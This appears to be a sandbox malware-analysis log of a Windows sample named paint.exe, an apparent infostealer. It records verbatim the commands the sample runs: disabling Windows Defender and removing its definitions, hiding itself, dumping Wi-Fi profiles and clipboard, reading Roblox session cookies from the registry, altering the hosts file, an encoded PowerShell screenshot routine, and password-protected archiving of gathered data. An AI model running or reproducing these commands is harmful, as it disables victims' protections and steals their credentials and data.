Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7844:120:WilError_03

Source: C:\Users\user\Desktop\paint.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI67162

Jump to behavior

Source: paint.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\paint.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\paint.exe

File read: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: paint.exe, paint.exe, 00000001.00000002.2015138259.00007FFDFB061000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: paint.exe	Virustotal: Detection: 43%
Source: paint.exe	ReversingLabs: Detection: 36%

Source: paint.exe	String found in binary or memory: set-addPolicy
Source: paint.exe	String found in binary or memory: id-cmc-addExtensions
Source: paint.exe	String found in binary or memory: can't send non-None value to a just-started coroutine
Source: paint.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: paint.exe	String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
Source: paint.exe	String found in binary or memory: --help
Source: paint.exe	String found in binary or memory: --help
Source: paint.exe	String found in binary or memory: can't send non-None value to a just-started generator
Source: paint.exe	String found in binary or memory: can't send non-None value to a just-started async generator

Source: C:\Users\user\Desktop\paint.exe

File read: C:\Users\user\Desktop\paint.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Users\user\Desktop\paint.exe "C:\Users\user\Desktop\paint.exe"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\paint.exe""
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Success!', 0, '@.4xray_', 48+16);close()"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\paint.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7663.tmp" "c:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\paint.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *"
